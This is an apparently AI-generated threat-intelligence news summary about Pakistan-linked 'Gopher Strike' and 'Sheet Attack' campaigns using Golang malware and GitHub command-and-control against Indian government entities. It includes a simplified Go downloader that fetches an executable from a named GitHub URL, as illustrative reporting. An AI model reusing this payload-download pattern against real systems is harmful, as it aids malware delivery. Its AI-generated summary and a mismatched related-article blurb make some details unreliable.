Pakistan-Linked Hackers Target Indian Government with Novel Golang Malware
These articles are AI-generated summaries. Please check the original sources for full details.
Pakistan-Linked Cyber Campaigns Target Indian Government Entities
Indian government entities have been the target of two campaigns, dubbed “Gopher Strike” and “Sheet Attack,” originating from a Pakistan-linked actor, employing previously undocumented techniques. Zscaler ThreatLabz identified these campaigns in September 2025, noting potential ties to, but also distinctions from, the known APT36 group.
While ideal threat modeling assumes isolated incidents, these campaigns demonstrate a coordinated effort to bypass security measures and establish persistent access, highlighting the increasing sophistication of nation-state actors. The potential scale of compromise involving government entities could lead to significant data exfiltration and disruption of critical services, representing a major national security risk.
Key Insights
- Gopher Strike & Sheet Attack identified, 2025: Two distinct campaigns discovered by Zscaler researchers targeting Indian government systems.
- Golang Malware: Exploitation of Golang for creating downloaders (GOGITTER) and backdoors (GITSHELLPAD). This suggests a shift toward Golang for its cross-platform capabilities and evasion potential.
- GitHub as C2: Leveraged GitHub’s infrastructure for command-and-control (C2), using private repositories to download malicious payloads and exfiltrate data, circumventing traditional security monitoring.
Working Example
// Example of a simplified GOGITTER functionality (Golang downloader)
package main
import (
"fmt"
"io/ioutil"
"net/http"
"os"
)
func main() {
// Simulated GitHub repository URL
githubRepoURL := "https://github.com/jaishankai/sockv6/raw/main/edgehost.exe"
// Download the executable
resp, err := http.Get(githubRepoURL)
if err != nil {
fmt.Println("Error downloading file:", err)
return
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
fmt.Println("Error reading response body:", err)
return
}
// Save the file
err = ioutil.WriteFile("edgehost.exe", body, 0644)
if err != nil {
fmt.Println("Error writing file:", err)
return
}
fmt.Println("File downloaded and saved as edgehost.exe")
}Practical Applications
- Government Agencies: Implement stricter inbound traffic filtering, particularly regarding ISO image downloads and scheduled task monitoring, to prevent initial access.
- Pitfall: Over-reliance on signature-based detection; Golang and dynamically generated payloads easily bypass traditional AV solutions, necessitating behavioral analysis.
References:
Continue reading
Next article
GitHub Copilot CLI: A DevOps Engineer's Practical Guide to AI-Powered Terminal Automation
Related Content
Russian Hackers Target Ukrainian Organizations Using Stealthy Living-Off-the-Land Tactics
Russian threat actors targeted Ukrainian organizations using stealthy Living-Off-the-Land (LotL) tactics, leveraging dual-use tools and minimal malware to evade detection. The attack involved web shells, PowerShell backdoors, and memory dumps, with implications for global cybersecurity strategies.
Iranian Hackers Launch ‘SpearSpecter’ Spy Operation on Defense & Government Targets
Iran’s APT42 launched the ‘SpearSpecter’ campaign in September 2025, targeting defense and government officials with the TAMECAT malware.
Iranian Hackers Use DEEPROOT and TWOSTROKE Malware in Aerospace and Defense Attacks
UNC1549, an Iranian threat actor, successfully breached 11 European telecom companies via a LinkedIn-based social engineering campaign.